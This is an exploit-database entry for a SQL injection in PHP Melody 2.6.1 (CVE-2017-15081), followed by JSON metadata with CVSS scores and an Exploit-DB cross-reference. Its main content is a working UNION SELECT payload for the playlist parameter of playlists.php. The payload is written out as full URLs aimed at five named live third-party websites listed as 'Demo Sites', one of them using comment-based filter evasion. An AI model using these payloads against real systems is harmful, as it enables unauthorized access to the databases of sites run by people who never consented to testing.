ID 1337DAY-ID-28863
Type zdt
Reporter Venkat Rajgor
Modified 2017-10-25T00:00:00
Description
Exploit for php platform in category web applications
---------------------------------------------------
PHP Melody 2.6.1 SQL Injection
---------------------------------------------------
###################################################
[+] Author : Venkat Rajgor
[+] Email : [email protected]
[+] Vulnerability : SQL injection
###################################################
---------info Cms----------------
name : PHP Melody version 2.6.1
email : [email protected]
dowloand : http://www.phpsugar.com
web : http://www.phpsugar.com
price : $39 USD
Vulnerable parameter: playlists.php?playlist='
Demo Sites:
[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -
[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'
/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64
69763e,version(),0x3c212d2d),null,null,null,null,null,
# 0day.today [2018-03-16] #
{"href": "https://0day.today/exploit/description/28863", "sourceData": "---------------------------------------------------\r\nPHP Melody 2.6.1 SQL Injection\r\n---------------------------------------------------\r\n ###################################################\r\n [+] Author : Venkat Rajgor\r\n [+] Email : [email\u00a0protected]\r\n [+] Vulnerability : SQL injection\r\n ###################################################\r\n\r\n---------info Cms----------------\r\nname : PHP Melody version 2.6.1\r\nemail : [email\u00a0protected]\r\ndowloand : http://www.phpsugar.com\r\nweb : http://www.phpsugar.com\r\nprice : $39 USD\r\n\r\nVulnerable parameter: playlists.php?playlist='\r\n\r\nDemo Sites:\r\n\r\n[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT\r\nnull,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),\r\nnull,null,null,null,null,null,null,null,null-- -\r\n\r\n[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT\r\nnull,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),\r\nnull,null,null,null,null,null,null,null,null-- -\r\n\r\n[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT\r\nnull,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),\r\nnull,null,null,null,null,null,null,null,null-- -\r\n\r\n[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT\r\nnull,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),\r\nnull,null,null,null,null,null,null,null,null-- -\r\n\r\n[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'\r\n/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64\r\n69763e,version(),0x3c212d2d),null,null,null,null,null,\n\n# 0day.today [2018-03-16] #", "bulletinFamily": "exploit", "modified": "2017-10-25T00:00:00", "title": "PHP Melody 2.6.1 SQL Injection Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://0day.today/exploit/28863", "cvelist": ["CVE-2017-15081"], "description": "Exploit for php platform in category web applications", "viewCount": 9, "published": "2017-10-25T00:00:00", "edition": 1, "id": "1337DAY-ID-28863", "type": "zdt", "lastseen": "2018-03-16T19:14:01", "reporter": "Venkat Rajgor", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-03-16T19:14:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-15081"]}, {"type": "exploitdb", "idList": ["EDB-ID:43062"]}], "modified": "2018-03-16T19:14:01", "rev": 2}, "vulnersScore": 7.0}, "references": []}
{"cve": [{"lastseen": "2021-02-02T06:36:37", "description": "In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-24T06:29:00", "title": "CVE-2017-15081", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15081"], "modified": "2017-11-14T15:10:00", "cpe": ["cpe:/a:phpsugar:php_melody:2.6.1"], "id": "CVE-2017-15081", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15081", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpsugar:php_melody:2.6.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2017-10-30T14:31:16", "description": "PHP Melody 2.6.1 - SQL Injection. CVE-2017-15081. Webapps exploit for PHP platform", "published": "2017-10-28T00:00:00", "type": "exploitdb", "title": "PHP Melody 2.6.1 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15081"], "modified": "2017-10-28T00:00:00", "id": "EDB-ID:43062", "href": "https://www.exploit-db.com/exploits/43062/", "sourceData": "###################################################\r\n[+] Author : Venkat Rajgor\r\n[+] Email : Venki9990@gmail.com\r\n[+] Vulnerability : SQL injection\r\n###################################################\r\nE-mail ID : support@phpsugar.com\r\nDownload : http://www.phpsugar.com\r\nWeb : http://www.phpsugar.com\r\nPrice : $39 USD\r\n###################################################\r\nVulnerable parameter: http://x.x.x.x/playlists.php?playlist=\r\nApplication : PHPSUGAR PHP Melody version 2.6.1\r\nVulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection\r\n###################################################\r\n\r\nDescription : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.\r\n\r\nPayload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43062/"}]}